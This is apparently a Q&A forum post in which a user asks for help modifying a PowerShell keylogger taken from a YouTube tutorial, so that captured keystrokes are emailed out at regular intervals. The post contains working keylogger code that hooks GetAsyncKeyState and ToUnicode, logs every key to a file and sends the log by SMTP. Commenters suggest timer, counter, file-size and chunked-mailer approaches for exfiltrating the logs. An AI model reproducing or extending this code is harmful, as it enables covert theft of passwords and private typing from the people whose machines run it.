# Powershell Script; Keylogger, need help! Anyone with PS knowledge

Tags: powershell, keylogger

I'm reworking a keylogger powershell script that I found via a youtube tutorial (Cosmodium CS), but I want the logs to be sent to an email address in intervals and not only once on machine restart or when manually executing the c.cmd file. As that's how its currently working. Is there any way to schedule it, some sort of simple while statement that will $smtp.send in intervals, or only if(log.file ) reaches a certain size or a timer. I'm a noob to powershell so trying to learn :)

Here's a snippet of the current code

```
    # set up API
 $API = Add-Type -MemberDefinition $APIsignatures -Name 'Win32' -Namespace API -PassThru

  # attempt to log keystrokes
  try {

    # loops keystroke detection
    while ($true) {
      Start-Sleep -Milliseconds 40

      for ($ascii = 9; $ascii -le 254; $ascii++) {

        # use API to get key state
        $keystate = $API::GetAsyncKeyState($ascii)

        # use API to detect keystroke
        if ($keystate -eq -32767) {
          $null = [console]::CapsLock

          # map virtual key
          $mapKey = $API::MapVirtualKey($ascii, 3)

          # create a stringbuilder
          $keyboardState = New-Object Byte[] 256
          $hideKeyboardState = $API::GetKeyboardState($keyboardState)
          $loggedchar = New-Object -TypeName System.Text.StringBuilder

          # translate virtual key
          if ($API::ToUnicode($ascii, $mapKey, $keyboardState, $loggedchar, $loggedchar.Capacity, 0)) {
            # add logged key to file
            [System.IO.File]::AppendAllText($logFile, $loggedchar, [System.Text.Encoding]::Unicode)
          }
        }
      }
    }
  }

  # send logs if code fails
  finally {
    # send email
    $smtp.Send($email, $email, $subject, $logs);
  }
}

# run keylogger
KeyLogger
```

Any help would be great!

Comment: This appears to be a duplicate of https://stackoverflow.com/questions/69306459/rubberducky-keylogger?

Comment: yea I didn't know it was going to be transfered, initially posted it on the security stack overflow but migrated here. this one is more coherent lol

Comment: Probably a good idea to delete the other question. You could set up a counter and increment it in your while loop, and when it gets above a certain value, send the e-mail and reset the counter, or get a start time into a variable (say $start), check in the loop for Get-Date greater than $start.AddHours(1), then reset $start, or just Get-Item -Path $logFile and check the Length property, send the mail, then clear the logfile.

Comment: I'm really not familiar with the powershell syntax, so if i could have a single liner written out would be kind

Comment: Sending email will stop the script from sampling the keystrokes.
Why don't you have the keylogger write to a log files in increments of say 4K chunks, and another script mail the log files as they fill up and a new is created?